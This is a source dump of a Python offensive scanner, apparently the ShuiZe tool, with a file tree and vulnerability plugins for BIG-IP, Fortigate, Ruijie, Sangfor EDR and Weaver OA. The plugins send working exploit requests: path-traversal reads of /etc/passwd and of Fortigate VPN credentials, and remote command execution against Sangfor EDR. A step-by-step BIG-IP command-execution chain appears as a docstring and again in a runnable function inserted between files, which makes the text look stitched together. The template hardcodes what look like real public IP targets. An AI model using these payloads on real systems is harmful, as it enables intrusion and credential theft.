├── Plugins
├── Vul
│ ├── CMS
│ │ ├── BIG-IP.py
│ │ ├── Fortigate.py
│ │ ├── Nexus.py
│ │ ├── RuiJie.py
│ │ ├── SangforEdr.py
│ │ ├── Solr.py
│ │ ├── SpringBoot.py
│ │ ├── Tomcat.py
│ │ ├── Tomcat_AJP_LFI.py
│ │ ├── Zabbix.py
│ │ ├── __init__.py
│ │ ├── __template__.py
│ │ ├── fanwei.py
│ │ ├── qizhi.py
│ │ ├── seeyon.py
│ │ ├── tongda.py
│ │ └── tongda_include.py
│ ├── Nuclei
│ │ ├── NucleiApi.py
│ │ ├── __init__.py
│ │ └── nuclei
│ ├── ObserverWard
│ │ ├── ObserverWardApi.py
│ │ ├── __init__.py
│ │ └── observer_ward
│ ├── Param
│ │ ├── SqlInject.py
│ │ ├── __init__.py
│ │ └── __template__.py
│ ├── Service
│ │ ├── __init__.py
│ │ ├── unAuthElastic.py
│ │ ├── unAuthLdaps.py
│ │ ├── unAuthMongodb.py
│ │ ├── unAuthRedis.py
│ │ ├── unAuthZookeeper.py
│ │ ├── weakMSSQL.py
│ │ ├── weakMYSQL.py
│ │ └── weakSSH.py
│ ├── Web
│ │ ├── BackupFile.py
│ │ ├── Editor.py
│ │ ├── FineReport.py
│ │ ├── HILLSTONE.py
│ │ ├── IBM.py
│ │ ├── JEECMS.py
│ │ ├── Jboss.py
│ │ ├── JumpServer.py
│ │ ├── Mail.py
│ │ ├── Nacos.py
│ │ ├── Nginx.py
│ │ ├── __Realor.py
│ │ ├── __init__.py
│ │ ├── __template__.py
│ │ ├── axis2.py
│ │ ├── baota.py
│ │ ├── cms.py
│ │ ├── cmspro.py
│ │ ├── codeLeak.py
│ │ ├── easyConnect.py
│ │ ├── emobile.py
│ │ ├── iOffice.py
│ │ ├── indexCms.py
│ │ ├── phpstudy.py
│ │ ├── shiro.py
│ │ ├── struts2.py
│ │ ├── thinkphp.py
│ │ ├── weblogic.py
│ │ ├── yongyou.py
│ │ └── zentao.py
│ ├── Win
│ │ ├── CVE_2020_0796.py
│ │ └── __init__.py
│ └── __init__.py
├── __init__.py
├── infoGather
│ ├── Intranet
│ │ ├── __init__.py
│ │ ├── getMoreIp.py
│ │ └── scanPort
│ │ │ ├── __init__.py
│ │ │ └── scanPort.py
│ ├── ParamSpider
│ │ ├── __init__.py
│ │ └── paramSpider.py
│ ├── SocksProxy
│ │ ├── __init__.py
│ │ └── getSocksProxy.py
│ ├── WebspaceSearchEngine
│ │ ├── __init__.py
│ │ ├── fofaApi.py
│ │ ├── qianxinApi.py
│ │ ├── quakeApi.py
│ │ └── shodanApi.py
│ ├── __init__.py
│ ├── subdomain
│ │ ├── Aiqicha
│ │ │ ├── Aiqicha.py
│ │ │ └── __init__.py
│ │ ├── CDN
│ │ │ ├── GeoLite2-ASN.mmdb
│ │ │ ├── __init__.py
│ │ │ ├── cdn-domain.conf
│ │ │ └── checkCDN.py
│ │ ├── CSubnet
│ │ │ ├── CSubnet.py
│ │ │ ├── __init__.py
│ │ │ └── demo.py
│ │ ├── Certs
│ │ │ ├── __init__.py
│ │ │ ├── cacert.pem
│ │ │ └── crawlCerts.py
│ │ ├── FriendChins
│ │ │ ├── __init__.py
│ │ │ └── crawlFriendChins.py
│ │ ├── Spider
│ │ │ ├── Baidu
│ │ │ │ ├── __init__.py
│ │ │ │ └── baidu.py
│ │ │ ├── Bing
│ │ │ │ ├── __init__.py
│ │ │ │ └── bing.py
│ │ │ ├── Google
│ │ │ │ ├── .google-cookie
│ │ │ │ ├── .travis.yml
│ │ │ │ ├── demo.py
│ │ │ │ ├── docs
│ │ │ │ │ ├── .gitignore
│ │ │ │ │ ├── Makefile
│ │ │ │ │ ├── conf.py
│ │ │ │ │ ├── index.rst
│ │ │ │ │ └── make.bat
│ │ │ │ ├── google.py
│ │ │ │ └── googlesearch
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── user_agents.txt.gz
│ │ │ └── __init__.py
│ │ ├── Sublist3r
│ │ │ ├── README.md
│ │ │ ├── setup.py
│ │ │ ├── subbrute
│ │ │ │ ├── __init__.py
│ │ │ │ ├── names.txt
│ │ │ │ ├── resolvers.txt
│ │ │ │ └── subbrute.py
│ │ │ └── sublist3r.py
│ │ ├── __init__.py
│ │ ├── beian2NewDomain
│ │ │ ├── __init__.py
│ │ │ └── beian2domain.py
│ │ ├── domain.py
│ │ ├── githubSubdomains
│ │ │ ├── __init__.py
│ │ │ └── githubSubdomains.py
│ │ ├── hostCollide
│ │ │ ├── __init__.py
│ │ │ └── hostCollide.py
│ │ ├── ip2domain
│ │ │ ├── __init__.py
│ │ │ └── getIp2Domain.py
│ │ ├── ipAddress
│ │ │ ├── __init__.py
│ │ │ └── getIpAddress.py
│ │ ├── ksubdomain
│ │ │ ├── __init__.py
│ │ │ ├── ksubdomain.py
│ │ │ └── ksubdomain_linux
│ │ ├── lijiejie
│ │ │ ├── .gitignore
│ │ │ ├── 1.txt
│ │ │ ├── README.md
│ │ │ ├── __init__.py
│ │ │ ├── lib
│ │ │ │ ├── __init__.py
│ │ │ │ ├── cmdline.py
│ │ │ │ ├── common.py
│ │ │ │ └── consle_width.py
│ │ │ └── subDomainsBrute.py
│ │ ├── othersApiSubdomains
│ │ │ ├── __init__.py
│ │ │ └── othersApiSubdomains.py
│ │ ├── queryA
│ │ │ ├── __init__.py
│ │ │ └── queryA.py
│ │ ├── scanPort
│ │ │ ├── __init__.py
│ │ │ ├── demo.py
│ │ │ ├── scanPort.py
│ │ │ └── server_info.ini
│ │ ├── subdomain3
│ │ │ ├── Bruteapi.py
│ │ │ ├── __init__.py
│ │ │ ├── brutedns.py
│ │ │ └── config
│ │ │ │ ├── __init__.py
│ │ │ │ └── config.py
│ │ ├── subdomainInterface
│ │ │ ├── __init__.py
│ │ │ └── subdomainInterface.py
│ │ ├── template
│ │ │ └── multiThreading.py
│ │ ├── theHarvester
│ │ │ ├── .gitattributes
│ │ │ ├── .gitignore
│ │ │ ├── .lgtm.yml
│ │ │ ├── .travis.yml
│ │ │ ├── Dockerfile
│ │ │ ├── Pipfile
│ │ │ ├── Pipfile.lock
│ │ │ ├── README.md
│ │ │ ├── README
│ │ │ │ ├── CONTRIBUTING.md
│ │ │ │ ├── COPYING
│ │ │ │ └── LICENSES
│ │ │ ├── api-keys.yaml
│ │ │ ├── mypy.ini
│ │ │ ├── proxies.yaml
│ │ │ ├── requirements.txt
│ │ │ ├── requirements
│ │ │ │ ├── base.txt
│ │ │ │ └── dev.txt
│ │ │ ├── runTheHarvester
│ │ │ │ ├── __init__.py
│ │ │ │ ├── __main__.py
│ │ │ │ ├── discovery
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── baidusearch.py
│ │ │ │ │ ├── bingsearch.py
│ │ │ │ │ ├── bufferoverun.py
│ │ │ │ │ ├── certspottersearch.py
│ │ │ │ │ ├── constants.py
│ │ │ │ │ ├── crtsh.py
│ │ │ │ │ ├── dnsdumpster.py
│ │ │ │ │ ├── dnssearch.py
│ │ │ │ │ ├── dogpilesearch.py
│ │ │ │ │ ├── duckduckgosearch.py
│ │ │ │ │ ├── exaleadsearch.py
│ │ │ │ │ ├── githubcode.py
│ │ │ │ │ ├── googlesearch.py
│ │ │ │ │ ├── hackertarget.py
│ │ │ │ │ ├── huntersearch.py
│ │ │ │ │ ├── intelxsearch.py
│ │ │ │ │ ├── linkedinsearch.py
│ │ │ │ │ ├── netcraft.py
│ │ │ │ │ ├── otxsearch.py
│ │ │ │ │ ├── pentesttools.py
│ │ │ │ │ ├── rapiddns.py
│ │ │ │ │ ├── securitytrailssearch.py
│ │ │ │ │ ├── shodansearch.py
│ │ │ │ │ ├── spyse.py
│ │ │ │ │ ├── sublist3r.py
│ │ │ │ │ ├── suip.py
│ │ │ │ │ ├── takeover.py
│ │ │ │ │ ├── threatcrowd.py
│ │ │ │ │ ├── threatminer.py
│ │ │ │ │ ├── trello.py
│ │ │ │ │ ├── twittersearch.py
│ │ │ │ │ ├── urlscan.py
│ │ │ │ │ ├── virustotal.py
│ │ │ │ │ └── yahoosearch.py
│ │ │ │ ├── lib
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── core.py
│ │ │ │ │ ├── hostchecker.py
│ │ │ │ │ ├── ip-ranges.json
│ │ │ │ │ ├── reportgraph.py
│ │ │ │ │ ├── resolvers.txt
│ │ │ │ │ ├── stash.py
│ │ │ │ │ └── statichtmlgenerator.py
│ │ │ │ └── parsers
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── intelxparser.py
│ │ │ │ │ ├── myparser.py
│ │ │ │ │ └── securitytrailsparser.py
│ │ │ ├── setup.cfg
│ │ │ ├── setup.py
│ │ │ ├── tests
│ │ │ │ ├── __init__.py
│ │ │ │ ├── discovery
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── test_certspotter.py
│ │ │ │ │ ├── test_githubcode.py
│ │ │ │ │ ├── test_linkedin_links.py
│ │ │ │ │ ├── test_linkedin_links.txt
│ │ │ │ │ ├── test_otx.py
│ │ │ │ │ ├── test_sublist3r.py
│ │ │ │ │ └── test_threatminer.py
│ │ │ │ └── test_myparser.py
│ │ │ ├── theHarvester-logo.png
│ │ │ ├── theHarvester.py
│ │ │ └── wordlists
│ │ │ │ ├── dns-big.txt
│ │ │ │ ├── dns-names.txt
│ │ │ │ ├── dorks.txt
│ │ │ │ ├── general
│ │ │ │ └── common.txt
│ │ │ │ └── names_small.txt
│ │ ├── verifyEmails
│ │ │ ├── VerifyEmails.py
│ │ │ ├── __init__.py
│ │ │ ├── mail.txt
│ │ │ └── 常见用户名.txt
│ │ └── webDetect
│ │ │ ├── __init__.py
│ │ │ ├── demo.py
│ │ │ └── result.txt
│ └── webInfo
│ │ ├── Feature.json
│ │ ├── Wappalyzer
│ │ ├── Wappalyzer.py
│ │ ├── __init__.py
│ │ └── data
│ │ │ └── apps.json
│ │ ├── __init__.py
│ │ ├── getWebInfo.py
│ │ └── getWebTitle.py
└── saveToExcel.py
├── README.md
├── ShuiZe.py
├── __init__.py
├── build.sh
├── docker_build.sh
├── imgs
├── 0x727.png
├── ObserverWard1.png
├── aiqicha.png
├── banner.png
├── github_auther.png
├── hostCollide.png
├── image-20210728132105833.png
├── image-20210728132752381.png
├── image-20210728133047590.png
├── image-20210728134051049.png
├── image-20210728134115608.png
├── image-20210728134131076.png
├── image-20210728134212279.png
├── image-20210728134304533.png
├── image-20210728153419131.png
├── image-20210728154929084.png
├── image-20210728155358378.png
├── image-20210728155541501-7458943.png
├── image-20210728155541501.png
├── image-20210728160705706.png
├── image-20210728161022348.png
├── image-20210728161117459.png
├── image-20210728161339208.png
├── image-20210728161507035.png
├── image-20210728161711534.png
├── image-20210728162049962.png
├── image-20210728162119531.png
├── image-20210728162303312.png
├── image-20210728162441132.png
├── image-20210728162655684.png
├── image-20210728163216047.png
├── image-20210728163926763.png
├── image-20210728163940918.png
├── image-20210728164010063.png
├── image-20210728164040649.png
├── image-20210728164146630.png
├── image-20210728164211552.png
├── image-20210728164316747.png
├── image-20210728164555141.png
├── image-20210728164745820.png
├── image-20210728164811422.png
├── image-20210728164933353.png
├── image-20210728165004202.png
├── image-20210728165052361.png
├── image-20210728165612314.png
├── image-20210728170303756.png
├── image-20210728193058487.png
├── kuaidaili1.png
├── kuaidaili2.png
├── kuaidaili3.png
├── kuaidaili4.png
├── nuclei_1.png
├── qianxinApi.png
├── qianxinApi2.png
├── quakeApi.png
├── quakeApi2.png
├── securitytrails.png
├── socksProxy.png
└── xmind.png
├── iniFile
├── PwdTxt
│ ├── dic_password_ftp.txt
│ ├── dic_password_imap.txt
│ ├── dic_password_imap_ssl.txt
│ ├── dic_password_memcached.txt
│ ├── dic_password_mongodb.txt
│ ├── dic_password_mysql.txt
│ ├── dic_password_oracle.txt
│ ├── dic_password_pop3.txt
│ ├── dic_password_postgresql.txt
│ ├── dic_password_rdp.txt
│ ├── dic_password_redis.txt
│ ├── dic_password_smtp.txt
│ ├── dic_password_sqlserver.txt
│ ├── dic_password_ssh.txt
│ ├── dic_password_svn.txt
│ ├── dic_password_telnet.txt
│ ├── dic_password_tomcat.txt
│ ├── dic_password_vnc.txt
│ └── dic_password_weblogic.txt
├── SQLPayloads
│ ├── blank.xml
│ ├── errors.xml
│ ├── payloads.xml
│ └── test.xml
├── config.ini
├── dict
│ ├── dns_servers.txt
│ ├── next_sub.txt
│ ├── next_sub_full.txt
│ ├── subnames.txt
│ ├── subnames_all_5_letters.txt
│ └── subnames_full.txt
└── subdomain3
│ ├── cdn_servers.txt
│ ├── name_servers.txt
│ ├── next_sub_full.txt
│ └── sub_full.txt
├── requirements.txt
├── requirements2.txt
└── versionFlag.txt
/Plugins/Vul/CMS/BIG-IP.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
9 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
10 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
11 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # BIG-IP
15 | class Detect(threading.Thread):
16 | name = 'BIG-IP'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url
21 | self.vul_list = vul_list # stores the vulnerability names and urls
22 | self.proxies = requests_proxies # proxies
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # whether this url is vulnerable; defaults to False and is set to True once a vulnerability is found
25 |
26 | # Invoke the individual vulnerability checks
27 | def run_detect(self):
28 | # Arbitrary file read
29 | self.readFile()
30 |
31 | if not self.isExist:
32 | return False
33 | else:
34 | return True
35 |
36 | # Arbitrary file read
37 | def readFile(self):
38 | url1 = self.url + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
39 | tqdm.write(Fore.WHITE + 'test readFile : {}'.format(url1))
40 | try:
41 | res = requests.get(url=url1, headers=self.headers, proxies=self.proxies, verify=False)
42 | if '"root:x:0:0:root:' in res.text:
43 | self.isExist = True
44 | tqdm.write(Fore.RED + '[BIG-IP 任意文件读取] {}'.format(self.url))
45 | self.vul_list.append(['BIG-IP 任意文件读取', self.url, 'Yes {}'.format(url1)])
46 | except Exception as e:
47 | tqdm.write(Fore.WHITE + '{}'.format(e.args))
48 | return False
49 |
50 | # RCE
51 | def webVul2(self):
52 | '''
53 | 1. Hijack the tmsh list command by aliasing it to bash
54 | /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
55 |
56 | 2. Write the bash payload file
57 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/xxx&content=id
58 |
59 | 3. Execute the bash payload file
60 | /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/xxx
61 |
62 | 4. Restore the list command
63 | /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list
64 | :return:
65 | '''
66 |
67 | if __name__ == '__main__':
68 | from queue import Queue
69 |
70 | vul_list = []
71 | # proxy = r'192.168.168.148:10086'
72 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
73 | requests_proxies = None
74 | url = r'http://www.domain.com'
75 | Detect(url, vul_list, requests_proxies).run_detect()
76 |
77 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
78 | for vul in vul_list:
79 | tqdm.write(Fore.BLACK + str(vul))
80 |
81 |
--------------------------------------------------------------------------------
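The webVul2 method above only documents the BIG-IP tmsh command-execution chain and is never called from run_detect. A minimal, hedged sketch of that four-request chain is shown below; it reuses the exact paths from the docstring, while the /tmp/xxx marker file and the 'uid=' success check are illustrative assumptions rather than the plugin's actual logic.

import requests

def bigip_rce_check(base_url, headers=None, proxies=None):
    # The four requests documented in webVul2, issued in order.
    steps = [
        # 1. Hijack the tmsh 'list' command by aliasing it to bash
        '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash',
        # 2. Write the payload file (the /tmp/xxx name is illustrative)
        '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/xxx&content=id',
        # 3. Execute the payload file through the hijacked 'list' alias
        '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/xxx',
        # 4. Restore the original 'list' command
        '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list',
    ]
    outputs = []
    for path in steps:
        res = requests.get(base_url.rstrip('/') + path, headers=headers,
                           proxies=proxies, verify=False, timeout=10)
        outputs.append(res.text)
    # If the target is vulnerable, the third response carries the output of `id`.
    return 'uid=' in outputs[2]
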
/Plugins/Vul/CMS/Fortigate.py:
--------------------------------------------------------------------------------
1 | from urllib import request as urlRequests
2 | from termcolor import cprint
3 | import requests
4 | from tqdm import *
5 | from colorama import Fore
6 |
7 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
8 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
9 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
10 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
11 |
12 |
13 |
14 | # Fortigate SSL VPN vulnerability
15 | class Detect:
16 | name = 'Fortigate SSL VPN'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | self.url = url
20 | self.vul_list = vul_list # stores the vulnerability names and urls
21 | self.requests_proxies = requests_proxies
22 | self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'}
23 | self.isExist = False # whether this url is vulnerable; defaults to False and is set to True once a vulnerability is found
24 |
25 |
26 | def run_detect(self):
27 | # Check the arbitrary file read vulnerability
28 | self.read_UserPwd()
29 |
30 | if not self.isExist:
31 | return False
32 | else:
33 | return True
34 |
35 | # Arbitrary file read - dumps the VPN usernames and passwords
36 | def read_UserPwd(self):
37 | vul_url = '{}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'.format(self.url.rstrip('//'))
38 | res = requests.get(url=vul_url, headers=self.headers, proxies=self.requests_proxies, verify=False)
39 | if res.status_code == 200:
40 | tqdm.write(Fore.RED + '[Fortigate SSL VPN Read Username and Password] {}'.format(vul_url))
41 | self.vul_list.append(['Fortigate SSL VPN', self.url, 'YES {}'.format(vul_url)])
42 | self.isExist = True
43 | return True
44 | else:
45 | return False
46 |
47 |
48 | if __name__ == '__main__':
49 |
50 | vul_list = []
51 | # proxy = r'192.168.168.148:10086'
52 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
53 | requests_proxies = None
54 | url = r'http://www.domain.com'
55 | Detect(url, vul_list, requests_proxies).run_detect()
56 |
57 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
58 | for vul in vul_list:
59 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/RuiJie.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
9 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
10 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
11 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # Ruijie
15 | class Detect(threading.Thread):
16 | name = '锐捷漏洞'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url
21 | self.vul_list = vul_list # stores the vulnerability names and urls
22 | self.proxies = requests_proxies # proxies
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # whether this url is vulnerable; defaults to False and is set to True once a vulnerability is found
25 |
26 | # Invoke the individual vulnerability checks
27 | def run_detect(self):
28 | # Ruijie EG gateway RCE
29 | self.webVul1()
30 |
31 | if not self.isExist:
32 | return False
33 | else:
34 | return True
35 |
36 | # Ruijie EG gateway RCE
37 | def webVul1(self):
38 | url1 = self.url + '/guest_auth/guestIsUp.php'
39 | tqdm.write(Fore.WHITE + 'test RCE : {}'.format(url1))
40 | try:
41 | res = requests.get(url=url1, headers=self.headers, proxies=self.proxies, verify=False, allow_redirects=False)
42 | if res.status_code == 200:
43 | self.isExist = True
44 | tqdm.write(Fore.RED + '[锐捷易网关RCE] {}'.format(url1))
45 | self.vul_list.append(['锐捷易网关RCE', self.url, 'Yes {}'.format(url1)])
46 | except Exception as e:
47 | return False
48 |
49 | if __name__ == '__main__':
50 | from queue import Queue
51 |
52 | vul_list = []
53 | # proxy = r'192.168.168.148:10086'
54 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
55 | requests_proxies = None
56 | url = r'http://www.domain.com'
57 | Detect(url, vul_list, requests_proxies).run_detect()
58 |
59 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
60 | for vul in vul_list:
61 | tqdm.write(Fore.BLACK + str(vul))
62 |
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/SangforEdr.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
9 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
10 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
11 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # Sangfor EDR
15 | class Detect(threading.Thread):
16 | name = '深信服EDR'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url
21 | self.vul_list = vul_list # stores the vulnerability names and urls
22 | self.proxies = requests_proxies # proxies
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # whether this url is vulnerable; defaults to False and is set to True once a vulnerability is found
25 |
26 | # Invoke the individual vulnerability checks
27 | def run_detect(self):
28 | # Vulnerability 1
29 | self.webVul1()
30 |
31 | # Vulnerability 2
32 | self.webVul2()
33 |
34 | if not self.isExist:
35 | return False
36 | else:
37 | return True
38 |
39 | # Misconfiguration allowing unauthenticated access
40 | def webVul1(self):
41 | url1 = self.url + '/ui/login.php?user=admin'
42 | tqdm.write(Fore.WHITE + 'test admin : {}'.format(url1))
43 | try:
44 | res = requests.get(url=url1, headers=self.headers, proxies=self.proxies, verify=False, allow_redirects=False)
45 | if res.status_code == 302:
46 | self.isExist = True
47 | tqdm.write(Fore.RED + '[深信服EDR未授权admin登陆] {}'.format(url1))
48 | self.vul_list.append(['深信服EDR未授权admin登陆', self.url, 'Yes {}'.format(url1)])
49 | except Exception as e:
50 | return False
51 |
52 | # RCE
53 | def webVul2(self):
54 | url2 = self.url + '/tool/log/c.php?strip_slashes=system&host=id'
55 | tqdm.write(Fore.WHITE + 'test rce : {}'.format(url2))
56 | try:
57 | res = requests.get(url=url2, headers=self.headers, proxies=self.proxies, verify=False)
58 | if res.status_code == 200 and 'uid=' in res.text:
59 | self.isExist = True
60 | tqdm.write(Fore.RED + "[深信服EDR RCE] {}".format(url2))
61 | self.vul_list.append(['深信服EDR RCE', url2, "Yes"])
62 | except Exception as e:
63 | return False
64 |
65 | if __name__ == '__main__':
66 | from queue import Queue
67 |
68 | vul_list = []
69 | proxy = r'192.168.168.148:10086'
70 | requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
71 | # requests_proxies = None
72 | url = r'http://www.domain.com'
73 | Detect(url, vul_list, requests_proxies).run_detect()
74 |
75 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
76 | for vul in vul_list:
77 | tqdm.write(Fore.BLACK + str(vul))
78 |
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/CMS/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/__template__.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
9 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
10 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
11 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # Template
15 | class Detect(threading.Thread):
16 | name = '漏洞名'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url.rstrip('/')
21 | self.vul_list = vul_list # stores the vulnerability names and urls
22 | self.proxies = requests_proxies # proxies
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # whether this url is vulnerable; defaults to False and is set to True once a vulnerability is found
25 |
26 | # Invoke the individual vulnerability checks
27 | def run_detect(self):
28 | # Vulnerability 1
29 | self.webVul1()
30 |
31 | # Vulnerability 2
32 | self.webVul2()
33 |
34 | if not self.isExist:
35 | return False
36 | else:
37 | return True
38 |
39 | # Vulnerability 1
40 | def webVul1(self):
41 | url1 = self.url + '11111'
42 | tqdm.write(Fore.WHITE + 'test upload : {}'.format(url1))
43 | try:
44 | res = requests.get(url=url1, headers=self.headers, proxies=self.proxies, verify=False)
45 | if res.status_code == 200:
46 | self.isExist = True
47 | tqdm.write(Fore.RED + '[泛微oa 111] {}'.format(self.url))
48 | self.vul_list.append(['泛微oa 111', self.url, 'Yes {}'.format(url1)])
49 | except Exception as e:
50 | return False
51 |
52 | # Vulnerability 2
53 | def webVul2(self):
54 | url2 = self.url + '/222222'
55 | tqdm.write(Fore.WHITE + 'test sql : {}'.format(url2))
56 | try:
57 | res = requests.get(url=url2, headers=self.headers, proxies=self.proxies, verify=False)
58 | if res.status_code == 200 and '[{"' in res.text:
59 | self.isExist = True
60 | tqdm.write(Fore.RED + "[泛微oa SQL] {}222222".format(self.url))
61 | self.vul_list.append(['泛微oa SQL', self.url + "2222222", "Yes"])
62 | except Exception as e:
63 | # print(e.args)
64 | return False
65 |
66 | if __name__ == '__main__':
67 | from queue import Queue
68 |
69 | vul_list = []
70 | # proxy = r'192.168.168.148:10086'
71 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
72 | requests_proxies = None
73 | # url = r'https://223.72.156.204'
74 | url = r'https://210.82.119.85'
75 | Detect(url, vul_list, requests_proxies).run_detect()
76 |
77 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
78 | for vul in vul_list:
79 | tqdm.write(Fore.BLACK + str(vul))
80 |
81 |
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/fanwei.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
9 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
10 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
11 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # Weaver OA (fanwei)
15 | class Detect(threading.Thread):
16 | name = 'fanwei'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url.rstrip('/')
21 | self.vul_list = vul_list # stores the vulnerability names and urls
22 | self.proxies = requests_proxies # proxies
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # whether this url is vulnerable; defaults to False and is set to True once a vulnerability is found
25 |
26 | # Invoke the individual vulnerability checks
27 | def run_detect(self):
28 | # Arbitrary file upload
29 | self.upload1()
30 |
31 | # Vulnerability 2
32 | self.bridgeRead()
33 |
34 |
35 | if not self.isExist:
36 | return False
37 | else:
38 | return True
39 |
40 | # Weaver OA v9.0 pre-auth arbitrary file upload (getshell)
41 | def upload1(self):
42 | uploadOperation_url = self.url + '/page/exportImport/uploadOperation.jsp'
43 | try:
44 | res = requests.get(url=uploadOperation_url, headers=self.headers, proxies=self.proxies, verify=False, allow_redirects=False)
45 | if res.status_code == 200:
46 | self.isExist = True
47 | tqdm.write(Fore.RED + '[泛微OA v9.0 uploadOperation] {}'.format(self.url))
48 | self.vul_list.append(['泛微OA v9.0 uploadOperation', self.url, 'Yes {}'.format(uploadOperation_url)])
